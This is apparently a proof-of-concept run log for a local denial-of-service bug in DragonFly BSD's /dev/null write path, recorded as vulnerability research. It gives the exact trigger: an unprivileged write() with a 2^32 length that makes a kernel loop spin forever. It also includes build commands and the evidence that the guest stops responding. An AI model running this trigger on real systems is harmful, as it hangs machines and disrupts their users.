DF-0079 / run.log
================================================================================
DF-0079 — decisive runtime demonstration (host-side timeline + serial proof)
Guest: DragonFly 6.5-DEVELOPMENT x86_64, 2 CPUs, maxx uid 1001 (not in wheel)
================================================================================
[1] Build (as maxx):
$ cd poc/DF-0079 && cc -o df0079 df0079.c
BUILD_EXIT=0
-rwxr-xr-x 1 maxx maxx 9104 ... df0079
[2] Trigger (as UNPRIVILEGED maxx; /dev/null is mode 0666):
maxx$ cd poc/DF-0079 && nohup ./df0079 > w.out 2>&1 < /dev/null &
WEDGE_PID=889
# ./df0079 does: fd=open("/dev/null",O_WRONLY); write(fd,(void*)0x1,0x100000000ULL);
# ^^^ iov_len = 2^32, low 32 bits == 0 -> u_int c truncates to 0
# -> mmrw bookkeeping subtracts 0 -> while(uio_resid>0) spins forever
[3] Host-side ssh reachability timeline after trigger (probes every 1s):
t= 1s ssh=UNREACHABLE
t= 2s ssh=UNREACHABLE
t= 3s ssh=UNREACHABLE
t= 4s ssh=UNREACHABLE
t= 6s ssh=UNREACHABLE
t= 8s ssh=UNREACHABLE
t=10s ssh=UNREACHABLE
=> A SINGLE unprivileged write() rendered the guest unresponsive to ssh
within 1 second. No panic (clean starvation). Only `vm.sh reset` recovers.
================================================================================
EARLIER DECISIVE RUN (richer capture; wedge landed on the non-network CPU so a
serial-console watcher survived long enough to snapshot the wedged thread).
Full per-iteration ps/top in serial_wedge_capture.txt. Key excerpt:
================================================================================
PID  PPID  STAT  UID   %CPU  TIME     UCOMM   COMMAND
852  1     R0    1001  0.0   0:00.50  df0079  ./df0079   (t+0.0s)
852  1     R0    1001  0.0   0:01.68  df0079  ./df0079   (t+0.7s)
852  1     R0    1001  0.0   0:02.86  df0079  ./df0079   (t+1.4s)
...
852  1     R0    1001  0.0   0:20.56  df0079  ./df0079   (t+19.5s)
CPU states: 0.0% user, 0.0% nice, 50.0% system, 0.0% interrupt, 50.0% idle
(2-CPU guest: one core fully in kernel `sys` = the wedged mmrw loop.)
INTERPRETATION:
- STAT R0 : thread Running on CPU (not blocked/sleeping) -> spinning.
- UID 1001 : triggered by UNPRIVILEGED user maxx.
- TIME grows ~1.18s per ~1.0s wall -> 100% of one CPU, indefinitely.
- uio_resid never drains (c truncated to 0) -> the write() NEVER returns.
- process is unkillable (no signal-check point in the tight kernel loop);
  only a hard reset recovers the guest.
VERDICT: REPRODUCED. Trivial unprivileged full-system/local DoS.